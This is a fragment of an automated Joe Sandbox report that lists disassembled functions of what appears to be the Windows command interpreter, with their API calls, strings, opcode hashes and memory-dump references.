                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                    • String ID: $Application$System
                                                                                                                    • API String ID: 3377411628-1881496484
                                                                                                                    • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                    • Instruction ID: db9309a95da8677b2174458f3abc41395e5259ef81aad2885ecde66dcbdc8c36
                                                                                                                    • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                    • Instruction Fuzzy Hash: 13415B32B08B469AE710AF60E8403EDBBB5FB89B49F945135DA4E43B58EF38D145C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC14E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                    • String ID: :$\
                                                                                                                    • API String ID: 3961617410-1166558509
                                                                                                                    • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                    • Instruction ID: 6586388e420d2d36679d5b4b8182bdf1d2b707fbe51274eb925d89f843d4db35
                                                                                                                    • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                    • Instruction Fuzzy Hash: 83215322B0CA4A96E7506F60A444079FEB1FF89FA6BE48535D91F43790EF3CE445C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397130798-0
                                                                                                                    • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction ID: 34664e6156a1d32c6817267a535a5569741a9a4084b48e267746aadecc976287
                                                                                                                    • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction Fuzzy Hash: F091A422A09B8A8AEA64AF11D4542B9FBB1FF84F96FE48135D94D47794EF3CD540C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD25CA
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD25E8
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD260F
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD2636
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BD2650
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                    • API String ID: 3407644289-1668778490
                                                                                                                    • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                    • Instruction ID: 383bba7a901abc97d907fc68ec845616f3fc27c7e93672e814d3788794a9175a
                                                                                                                    • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                    • Instruction Fuzzy Hash: 61314F21A0C68A86FB147F61E819279EEB5BF85F82FE48035D60E462D5DE3CE404C735
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                    • String ID: &()[]{}^=;!%'+,`~
                                                                                                                    • API String ID: 2516562204-381716982
                                                                                                                    • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                    • Instruction ID: 2678c8a95d3dee1442205657d502266f00b47787bc7f2aa4b6abd7cd2b32b40c
                                                                                                                    • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                    • Instruction Fuzzy Hash: 62C19F32A0965586E754AF25E8402BEBBB0FB44F95FA45135DE8E43BA8EF3CE450C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • iswspace.MSVCRT ref: 00007FF789BD7EEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3731854180-3554254475
                                                                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction ID: a0b601ccd5637211f41bbeaa8fe29e82144f50270297ae409c0137a31fe209b1
                                                                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction Fuzzy Hash: 05A18C6190D6868AE660AF61E44427DFBB4FF45F92FA48034DA4E47794EF3CE441DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                    • API String ID: 1580871199-2613899276
                                                                                                                    • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                    • Instruction ID: 602341aadd481b161b18b769d46cc636394d344b273500f254cccb777a6ccd5a
                                                                                                                    • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                    • Instruction Fuzzy Hash: D5515171A18B8686EB10AF15E80067DBBB8FB88F86F955135EA5E03B54DF3CD401C754
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                    • String ID: con
                                                                                                                    • API String ID: 689241570-4257191772
                                                                                                                    • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                    • Instruction ID: 09fa438cfe9bbff5f43f216356ad2b10aed0e38628a4734d0af4256fe2f7642f
                                                                                                                    • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                    • Instruction Fuzzy Hash: 8E419231A086498AE210AF15948437DBEB5FB89FB6FA54334DA29533D0DF3DD849C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                    • String ID: PE
                                                                                                                    • API String ID: 2941894976-4258593460
                                                                                                                    • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                    • Instruction ID: 9585f9989d36a1e4ae3322beb0937051986fd9534c1c5b1f98b0536b4c863620
                                                                                                                    • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                    • Instruction Fuzzy Hash: 9641616560868586E620AF11E41067EFFB8FB89F92F944230DE5D03B95EF3CE445DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF789BE849D,?,?,?,00007FF789BEF0C7), ref: 00007FF789BD0045
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BEF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BD0071
                                                                                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0092
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BD00A7
                                                                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0148
                                                                                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD0181
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 734197835-0
                                                                                                                    • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                    • Instruction ID: f4ee308f52df0adb2ff546b7225aa6b219722e915cbf4566263f9fe6e7396104
                                                                                                                    • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                    • Instruction Fuzzy Hash: 79619431D0C69A86E724AF25A808379FEB1FB86F46FA48135D98E43794DF3CA405C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$Openwcsrchr
                                                                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                    • API String ID: 3402383852-1459555574
                                                                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction ID: dc353c4174861aaa6e403e47b12eee31b0740c6506c188e98ccad63909a334d8
                                                                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction Fuzzy Hash: 25A1C561A0864A82EE10BF95D0102BDEAB4FF85F96FE44531DA4E07785EF7CD949C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscmp
                                                                                                                    • String ID: %s
                                                                                                                    • API String ID: 243296809-3043279178
                                                                                                                    • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                    • Instruction ID: 7c5a5d5c0eea23a5e0898a8fa492a9965712f9fe5734ad78046793f132d4f533
                                                                                                                    • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                    • Instruction Fuzzy Hash: 09A1A36270978A8AEB61EF21D8443F9ABB0FF44B4AFA04035DA4D47695EF3CE645C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentVariable
                                                                                                                    • String ID: DIRCMD
                                                                                                                    • API String ID: 1405722092-1465291664
                                                                                                                    • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                    • Instruction ID: 882e33bc940eec38bb0857329425530dff62606c2b3d705f5db0d2a4cd4e7a66
                                                                                                                    • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                    • Instruction Fuzzy Hash: 06818172A08BC68AEB20EF60E8842ED7BB5FB44B49F604139DA8D57B58DF38D145C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
